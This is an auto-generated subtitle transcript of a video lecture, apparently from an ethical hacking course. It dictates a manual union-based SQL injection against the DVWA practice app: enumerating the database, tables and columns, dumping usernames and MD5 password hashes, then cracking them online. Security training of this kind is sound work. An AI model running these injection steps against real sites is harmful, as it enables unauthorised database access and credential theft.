1
00:00:00,120 --> 00:00:02,010
Hello everybody and welcome back.

2
00:00:02,010 --> 00:00:09,990
And let us continue basically from here what we want to do is first of all we want to find out the name

3
00:00:10,080 --> 00:00:16,770
of the database included in this server now in order for us to do that.

4
00:00:16,790 --> 00:00:19,080
We use this command.

5
00:00:19,220 --> 00:00:27,620
So let us just add to for the user I.D. apostrophe and then once again union select and then what we

6
00:00:27,620 --> 00:00:33,200
want to do is basically add two functions that will give us the name of the database and the name of

7
00:00:33,200 --> 00:00:35,430
the users linked to the database.

8
00:00:36,000 --> 00:00:37,290
So database.

9
00:00:37,550 --> 00:00:44,880
And then two parentheses which is the syntax for the functions in the code then comma users.

10
00:00:44,960 --> 00:00:53,480
And then again two parentheses and at the end we add hash tag and then add the apostrophe.

11
00:00:53,540 --> 00:00:55,370
So let us just run this

12
00:00:58,310 --> 00:01:02,360
UPS function DVR users does not exist.

13
00:01:02,820 --> 00:01:05,550
So let's see what's up with that.

14
00:01:05,820 --> 00:01:12,610
Let me just say it like this function DVR users doesn't exist.

15
00:01:12,610 --> 00:01:18,700
So let me just check point does it give that it should exist.

16
00:01:19,390 --> 00:01:21,370
Or maybe it is the user

17
00:01:24,910 --> 00:01:25,190
Yeah.

18
00:01:25,190 --> 00:01:33,130
It was a user so it's not the it's not the users and in parentheses it is user and then parentheses.

19
00:01:33,170 --> 00:01:40,730
So as we can see B got the name of the database with this function and the name of the database is DV

20
00:01:40,760 --> 00:01:51,190
w e and the name of the user that is corresponding to the database is DV a at local host now that we

21
00:01:51,190 --> 00:01:51,900
got the name.

22
00:01:51,970 --> 00:01:57,400
We want to go further on and let us run our next comment which we will type right here.

23
00:01:57,400 --> 00:02:01,150
So too as an I.D. and then we type here again.

24
00:02:01,210 --> 00:02:06,310
Union select then follow up with me right here.

25
00:02:06,310 --> 00:02:23,500
So S C H E M A underscore name and then comma to from information underscore Shima dot she Marta I believe

26
00:02:23,500 --> 00:02:29,410
that is how it is pronounced and then we at the end specify the common once again.

27
00:02:29,500 --> 00:02:33,820
Now let me just run this and then I will explain what did I run.

28
00:02:34,030 --> 00:02:43,230
As we can see right here the information underscores Shima has basically all configuration and information

29
00:02:43,260 --> 00:02:45,570
for the my actual database.

30
00:02:45,720 --> 00:02:52,380
So the DV w h should be the database for this application.

31
00:02:52,380 --> 00:02:57,950
Now this might be a little bit hard for you at the moment especially if you do not have any previous

32
00:02:57,950 --> 00:03:00,820
Eskil knowledge or knowledge about US fuel injection.

33
00:03:00,870 --> 00:03:03,540
This is basically some of the advanced part for this.

34
00:03:03,570 --> 00:03:10,800
So it might take you off for you a few times to re watch this and search on the Internet a few things

35
00:03:10,800 --> 00:03:14,990
in order to understand this fully but that's OK.

36
00:03:15,500 --> 00:03:16,650
We'll continue right here.

37
00:03:16,650 --> 00:03:22,290
So you will have the material to practice once you learn all of this.

38
00:03:23,130 --> 00:03:26,270
Now let's just continue.

39
00:03:26,270 --> 00:03:35,420
So we ran this command right here and we can see that the DV w ay is the database for this server for

40
00:03:35,420 --> 00:03:37,510
this application.

41
00:03:37,600 --> 00:03:39,830
Now the information the.

42
00:03:39,880 --> 00:03:40,410
Pardon me.

43
00:03:40,420 --> 00:03:48,370
Now we should send the query for tables in order to find out what tables are the the in the d w a database

44
00:03:49,540 --> 00:03:51,820
and we can do that with this command.

45
00:03:51,850 --> 00:04:00,910
So we start off with the idea once again and then union me union select then we want to select table

46
00:04:01,000 --> 00:04:04,210
underscore name coma.

47
00:04:04,560 --> 00:04:20,440
Uh two from information underscore Shima Dodd tables where table Shima equals uh apostrophe D.

48
00:04:20,470 --> 00:04:27,030
Double D VA w eight which is our database and then we specify the hash tag for the comment.

49
00:04:27,060 --> 00:04:29,320
And we ended with the apostrophe.

50
00:04:29,320 --> 00:04:36,950
We use the hashtag as a comment so it should ignore the rest of the code that comes after the hashtag.

51
00:04:37,000 --> 00:04:47,360
So as we can see right here we got two tables one with is guestbook and the other one is users.

52
00:04:47,400 --> 00:04:55,670
Now uh you as an attacker will most likely be interested in these table called users as it possibly

53
00:04:55,670 --> 00:05:00,860
could have some passwords and user names or any other valuable information in it.

54
00:05:03,370 --> 00:05:10,090
So after we discovered the tables we want to basically discover the columns in those tables and we will

55
00:05:10,090 --> 00:05:14,420
target this table right here which is the user stable.

56
00:05:14,440 --> 00:05:17,260
Now we want to find out what columns are there in the table.

57
00:05:17,260 --> 00:05:25,840
So we type here to apostrophe union select and also by the way this union select.

58
00:05:25,840 --> 00:05:28,180
You can also type in smaller letters.

59
00:05:28,180 --> 00:05:31,690
It doesn't have to be capital so it doesn't.

60
00:05:31,720 --> 00:05:33,910
You can type everything in small letters.

61
00:05:33,940 --> 00:05:41,590
I just type it in capital in order to differentiate the obscure comments from the tables and columns

62
00:05:41,590 --> 00:05:42,370
and all of that.

63
00:05:42,370 --> 00:05:44,800
So I will continue with the capital letters.

64
00:05:45,700 --> 00:05:58,960
So unions select now what we want is to select column name we also want to serve the column type from

65
00:05:59,620 --> 00:06:03,930
information underscore Shima dot columns.

66
00:06:03,940 --> 00:06:09,370
Now in the previous one we selected the from the information underscore schema that tables and now we

67
00:06:09,370 --> 00:06:19,570
want to select from information underscore Shimada columns where table underscore Shima let me see oh

68
00:06:19,640 --> 00:06:20,950
I didn't type it well.

69
00:06:21,020 --> 00:06:25,520
So Shima equals apostrophe D.

70
00:06:25,580 --> 00:06:37,070
The WPA and table underscore name equals users.

71
00:06:37,070 --> 00:06:45,130
And of course we end with our hash tag and then apostrophe now what we specified in this command we

72
00:06:45,130 --> 00:06:52,690
basically said well table Shima equals apostrophe DP w e that's we that's us selecting the database

73
00:06:52,750 --> 00:06:59,070
and table name equals users that are selecting the table that we want together columns from.

74
00:06:59,200 --> 00:07:05,840
So if we run this right here you will see we get a bunch of these columns in the table users.

75
00:07:05,950 --> 00:07:15,710
So this is our command right here and we can see we selected the database DV w a table name users and

76
00:07:15,710 --> 00:07:21,710
we were looking for the column name and column type the column name will be this thing.

77
00:07:21,710 --> 00:07:30,830
So user I.D. First Name Last Name user pass Avatar and column type would be the bar chart and then the

78
00:07:30,830 --> 00:07:33,550
number in the parentheses.

79
00:07:33,560 --> 00:07:40,070
Now out of all of this we are most likely going to be interested in the password one as we can see for

80
00:07:40,070 --> 00:07:51,320
the password there is specified the 32 characters as a max for that particular input and now that we

81
00:07:51,320 --> 00:07:58,910
got that we basically want to gather all of this information so and print them out on the screen you

82
00:07:58,910 --> 00:08:03,890
do not want to print out just password since you won't be knowing to hold that password belongs what

83
00:08:03,890 --> 00:08:11,210
we want to do we want to basically print out the first name last name and then the user and password

84
00:08:11,210 --> 00:08:18,680
for that first name and last name so we know who that user name and that password belongs to and for

85
00:08:18,680 --> 00:08:25,550
that we will use a special command called Comcast which will basically as it sells Comcast with things

86
00:08:25,550 --> 00:08:31,910
for us since we only can output two things with this application which is the first name and the surname.

87
00:08:31,910 --> 00:08:37,780
So we want to be able to print all of the information in these two outputs.

88
00:08:37,880 --> 00:08:46,230
So what we will do we will print the user I.D. first name and last name in the first name input.

89
00:08:46,340 --> 00:08:51,410
Well I mean in the first name output and we will print out the username and password under the surname

90
00:08:51,440 --> 00:08:53,700
output now.

91
00:08:53,760 --> 00:08:55,470
Let me see what I mean by that.

92
00:08:55,470 --> 00:08:57,960
So we'll type our blessed comment with this.

93
00:08:58,110 --> 00:09:07,880
So too for the I.D. then the apostrophe and then what we want to do is union select and now we want

94
00:09:07,880 --> 00:09:17,590
to count cat first thing we want to count get would be the user I.D. So user I.D. as we see it right

95
00:09:17,590 --> 00:09:20,710
here it is a column in the user's table.

96
00:09:20,710 --> 00:09:26,130
So we want to split it with the dash.

97
00:09:26,620 --> 00:09:29,070
So we know where it ends.

98
00:09:29,110 --> 00:09:35,860
So we split it with Dash and we add first name to it which is the second column in the user's table.

99
00:09:35,870 --> 00:09:41,020
We can see it right here and then we split that by the empty space.

100
00:09:41,020 --> 00:09:46,780
So just type move and just open up a path free and then empty space and then another apostrophe

101
00:09:50,130 --> 00:09:51,020
and then comma.

102
00:09:51,030 --> 00:09:57,670
And last thing we want to print under the First output which is the last name.

103
00:09:57,930 --> 00:10:05,350
So this is our first one let me just maybe it's easier for you.

104
00:10:05,350 --> 00:10:11,950
You can't really see the command right here so let me just type it in leaf pet and then I will copy

105
00:10:11,950 --> 00:10:17,640
it to the to the website.

106
00:10:17,650 --> 00:10:22,930
So let's just open leaf pad once again so you can see the whole command since this command is could

107
00:10:22,930 --> 00:10:27,350
be possibly a little bit hard to understand.

108
00:10:27,430 --> 00:10:34,510
We just lowered this so I can also open the Firefox.

109
00:10:34,510 --> 00:10:35,950
I do not need this.

110
00:10:36,070 --> 00:10:36,670
I need this.

111
00:10:36,700 --> 00:10:39,940
So let's start off with the command once again.

112
00:10:40,300 --> 00:10:49,410
So we started off as every command which is to as a user a D and an apostrophe and then union select.

113
00:10:49,630 --> 00:10:56,150
And as I said we want to serve to concrete a few information so that we can output all of them.

114
00:10:56,290 --> 00:10:58,660
We open parentheses user I.D..

115
00:10:58,840 --> 00:11:03,690
I believe it's that that is the first column as we can see right here.

116
00:11:03,700 --> 00:11:14,260
User I.D. then we want to type comma and then open apostrophe and then dash closed apostrophe and then

117
00:11:14,290 --> 00:11:20,280
another comma and then first name which is the second column I believe.

118
00:11:20,290 --> 00:11:21,250
Let us check out.

119
00:11:21,250 --> 00:11:23,550
Yes it is the first underscore name.

120
00:11:25,060 --> 00:11:33,720
Then we want to basically what we want to do is at the end space so that we can also type the last name

121
00:11:33,720 --> 00:11:34,840
after it.

122
00:11:34,920 --> 00:11:40,230
And then last name last underscore name and close parentheses.

123
00:11:40,350 --> 00:11:43,120
So let's see if it is really last name.

124
00:11:43,120 --> 00:11:44,460
Here it is last name.

125
00:11:45,780 --> 00:11:50,520
So after that we want to Kat the user name and password as well.

126
00:11:50,520 --> 00:11:56,280
So we type your comma and then com Kat and we want to Cat in the second output the user.

127
00:11:56,280 --> 00:11:57,150
So let me see.

128
00:11:57,150 --> 00:11:58,310
It is called the user.

129
00:11:58,500 --> 00:11:59,850
It is right here.

130
00:11:59,970 --> 00:12:01,320
And the password.

131
00:12:01,320 --> 00:12:04,840
Now we will split these two with the two dots.

132
00:12:04,990 --> 00:12:12,690
So apostrophe to dots and an apostrophe and then comma password.

133
00:12:12,690 --> 00:12:15,240
Let me see if it is password it should be.

134
00:12:15,580 --> 00:12:16,830
Yes it is.

135
00:12:17,030 --> 00:12:24,150
So we will print out the password and we want to select from where are we selecting all this information.

136
00:12:24,150 --> 00:12:31,780
So from TV w a dot user I believe that's how it is called.

137
00:12:31,780 --> 00:12:36,190
So I will just type that right here or maybe it is users.

138
00:12:36,190 --> 00:12:39,210
Let me just check out if it says anything.

139
00:12:39,210 --> 00:12:40,020
Right here.

140
00:12:41,020 --> 00:12:41,290
Yes.

141
00:12:41,290 --> 00:12:43,570
Table is called users.

142
00:12:45,520 --> 00:12:47,250
And then we add the hash tag.

143
00:12:47,260 --> 00:12:52,880
So it should ignore everything else from this comment from the rest of the code.

144
00:12:52,930 --> 00:12:58,090
So now that we selected all of this let us try out this command.

145
00:12:58,100 --> 00:13:01,000
It shouldn't give us any error unless I mistyped something.

146
00:13:01,000 --> 00:13:06,410
So we copy this We pasted right here and then we submit.

147
00:13:06,700 --> 00:13:14,680
And as you can see our output gave us all of the users their user name their passwords their first name

148
00:13:14,680 --> 00:13:22,540
their last name and the user I.D. as we can see in the first output which is the first name we got the

149
00:13:22,540 --> 00:13:26,950
user I.D. which is which we concatenate these three things.

150
00:13:27,460 --> 00:13:30,680
Maybe he's a bad example let's go to the Gordon.

151
00:13:30,700 --> 00:13:34,620
So user I.D. for Gordon needs to then we added the dash.

152
00:13:34,720 --> 00:13:37,460
Then we added first name then empty space.

153
00:13:37,480 --> 00:13:45,040
Then last name for the first output which is under the first name as we can see this right here corresponds

154
00:13:45,160 --> 00:13:45,730
to this

155
00:13:50,600 --> 00:13:57,500
and in the surname section we added the user name and password which for Gordon Brown the user name

156
00:13:57,890 --> 00:14:00,220
would be Gordon B.

157
00:14:00,260 --> 00:14:01,430
And then separated.

158
00:14:01,430 --> 00:14:04,310
We have the password right here.

159
00:14:04,310 --> 00:14:10,700
Now you might be asking these passwords look a little bit weird that is because these are not really

160
00:14:10,700 --> 00:14:11,460
passwords.

161
00:14:11,480 --> 00:14:14,860
These are the cash versions of the passwords.

162
00:14:14,930 --> 00:14:18,770
So if you tried to example again with this password it won't work.

163
00:14:18,770 --> 00:14:26,190
This is the password that is encrypted with some algorithm I will show you how to decrypt it in a few

164
00:14:26,190 --> 00:14:27,080
seconds.

165
00:14:27,120 --> 00:14:30,010
So let's just check out some of the other users first.

166
00:14:30,060 --> 00:14:37,010
So we have another user under the idea 3 which is called Hack and last name me.

167
00:14:37,380 --> 00:14:46,350
Once again this right here corresponds to this right here and the user for that account the user name

168
00:14:46,350 --> 00:14:53,580
for that account is Pablo and the cached version of his password is this we can see that in total we

169
00:14:53,580 --> 00:14:58,060
have six users right here and we got all of their passwords.

170
00:14:58,230 --> 00:15:05,690
Now we got to the end of the columns we got all of their usernames we got all the passwords all of the

171
00:15:05,690 --> 00:15:09,050
information yet we still can file again since Cynthia.

172
00:15:09,050 --> 00:15:12,580
These are hashed version of their passwords.

173
00:15:12,800 --> 00:15:20,540
Now the most easiest way to find out which to which type of encryption are they're hashed is to copy

174
00:15:20,660 --> 00:15:21,740
the hash itself.

175
00:15:21,740 --> 00:15:31,810
So let us just copy the first hash you just copied and just paste it in google and if it is in if it

176
00:15:31,810 --> 00:15:35,720
is a known hash it will print out what type of hash it is.

177
00:15:35,740 --> 00:15:45,010
Now since I already know this is the empty five hash and there are a bunch of empty five hash websites

178
00:15:45,160 --> 00:15:53,380
too that are used to decrypt the hash itself as we can see the hash and the five is admin.

179
00:15:53,650 --> 00:15:58,310
So the password for the admin account is admin as we already know.

180
00:15:58,480 --> 00:16:02,160
But let us try to also decrypt all of these other passwords.

181
00:16:02,190 --> 00:16:08,080
So now that we know that the hash type is empty five all of the other passwords we will also be the

182
00:16:08,080 --> 00:16:10,050
hash type and the five.

183
00:16:10,090 --> 00:16:20,110
So let us just type into Google simply and the five descriptor and here we can just go on to the first

184
00:16:20,260 --> 00:16:22,270
link for example it doesn't even matter

185
00:16:24,990 --> 00:16:26,650
last year ended five hashes.

186
00:16:26,890 --> 00:16:28,950
So state let me just see.

187
00:16:29,050 --> 00:16:30,780
Where do we tap it.

188
00:16:30,980 --> 00:16:40,460
Or let me just to go to this one free and first and if I have encryption wait I do not want to encrypt.

189
00:16:40,480 --> 00:16:48,970
I want to decrypt and define encryption we want to and we want and define decryption.

190
00:16:49,010 --> 00:16:49,850
Here it is.

191
00:16:49,880 --> 00:16:51,410
But I want to one step back.

192
00:16:51,410 --> 00:16:53,140
I believe this is the same website today.

193
00:16:53,150 --> 00:16:57,560
So we go to the empty five on line three and five decryption.

194
00:16:57,740 --> 00:16:59,860
And here we just type here.

195
00:16:59,880 --> 00:17:06,550
You're basically just based here your hash password and it will decrypt it if it is in the database.

196
00:17:06,650 --> 00:17:14,070
So let us go with the first one even though we already decrypted the first one and we said it was admin.

197
00:17:14,080 --> 00:17:15,970
Let us just check that once again.

198
00:17:16,040 --> 00:17:19,490
So we copy we pasted right here.

199
00:17:21,650 --> 00:17:25,120
So copy paste decrypt

200
00:17:28,820 --> 00:17:30,590
and it gives us somebody.

201
00:17:30,680 --> 00:17:34,400
So let us just select all images with the course.

202
00:17:34,460 --> 00:17:42,410
I don't know why this popped up popped up right here but we can verify it.

203
00:17:42,800 --> 00:17:46,340
Hopefully it doesn't go on with thousands of these screens.

204
00:17:46,370 --> 00:17:48,220
OK I believe it is over.

205
00:17:48,530 --> 00:17:56,990
And here we can see that it found the password for this hash which is admin now let us try another password

206
00:17:56,990 --> 00:18:00,530
from different users so let's go with the Gordon's password.

207
00:18:00,560 --> 00:18:09,190
We copy Gordon's hash for hash the value of that password and we type it right here so based decrypt

208
00:18:09,920 --> 00:18:13,220
and once again we get this confirmation.

209
00:18:13,220 --> 00:18:17,790
And I also don't know why this asks but it doesn't really matter.

210
00:18:17,790 --> 00:18:23,180
Let's just click OK and let's see what Gordon's passwords and Gordon's password is.

211
00:18:23,180 --> 00:18:24,920
ABC 1 2 3.

212
00:18:25,010 --> 00:18:28,250
Now you can also decrypt everyone's password right here.

213
00:18:28,250 --> 00:18:33,890
And if you're wondering how this works you can just read it right here it says and define the 128 bit

214
00:18:33,980 --> 00:18:40,140
encryption algorithm which generates a hexadecimal hash of 32 characters regardless of the input world

215
00:18:40,160 --> 00:18:41,240
size.

216
00:18:41,240 --> 00:18:43,070
Now how these Web sites works.

217
00:18:43,100 --> 00:18:47,960
It basically has a huge database of hash passwords and there has to.

218
00:18:48,230 --> 00:18:56,010
And they're decrypted passwords as we can see there over a thousand billion passwords in this database.

219
00:18:56,330 --> 00:19:04,010
And most likely all of these hashed version has version of passwords pardon me will be in that database

220
00:19:04,070 --> 00:19:05,090
and you can check that.

221
00:19:05,090 --> 00:19:09,020
So let's just go on with all of these hashed versions.

222
00:19:09,020 --> 00:19:10,550
We can just type it right here.

223
00:19:10,590 --> 00:19:18,910
Paste it decrypted and it will store France or it'll just select the store front and let us decrypt

224
00:19:18,970 --> 00:19:20,360
the password.

225
00:19:20,410 --> 00:19:26,280
So for the hacked me account the password is Charlie no.

226
00:19:26,310 --> 00:19:32,560
Let us not go over all of these passwords since it always asks me for some either to select cards from

227
00:19:32,560 --> 00:19:34,240
the pictures or store fronts.

228
00:19:34,240 --> 00:19:38,240
It doesn't even matter so I won't be bothering with the rest of the passwords.

229
00:19:38,350 --> 00:19:40,110
You can check them out if you want to.

230
00:19:40,240 --> 00:19:43,000
Just to check what the passwords for these accounts are.

231
00:19:43,840 --> 00:19:46,510
I believe they're all in this database right here.

232
00:19:46,510 --> 00:19:50,070
Since it is a huge database and that's about it.

233
00:19:50,170 --> 00:19:58,360
So we successfully exploited the fuel injection we manually exploited which is the advanced part from

234
00:19:58,360 --> 00:19:58,830
this.

235
00:19:58,840 --> 00:20:04,800
So there are a bunch of tools that automate this process but it is good to know how this process works.

236
00:20:04,810 --> 00:20:09,910
And it is good to do it manually a few times in order for you to understand it and then later on you

237
00:20:09,910 --> 00:20:15,510
can use other tools if you want to in order to automate this process.

238
00:20:15,560 --> 00:20:23,780
Now I'll just show you in the next video what is the blind SQL injection which is a lot harder than

239
00:20:23,780 --> 00:20:29,870
this one since we get the output right here but in the blind one we will not get output and it is most

240
00:20:29,870 --> 00:20:33,500
likely the case that you will always encounter.

241
00:20:33,590 --> 00:20:35,560
So I will show you how that works.

242
00:20:35,570 --> 00:20:40,820
We won't cover the entire blind as code injection city that will take a lot of time but we will cover

243
00:20:40,880 --> 00:20:43,870
the part I will show you how you can start with it.

244
00:20:44,450 --> 00:20:48,780
So that was it for this lecture and I hope I see you in the next one.

245
00:20:48,860 --> 00:20:49,160
My.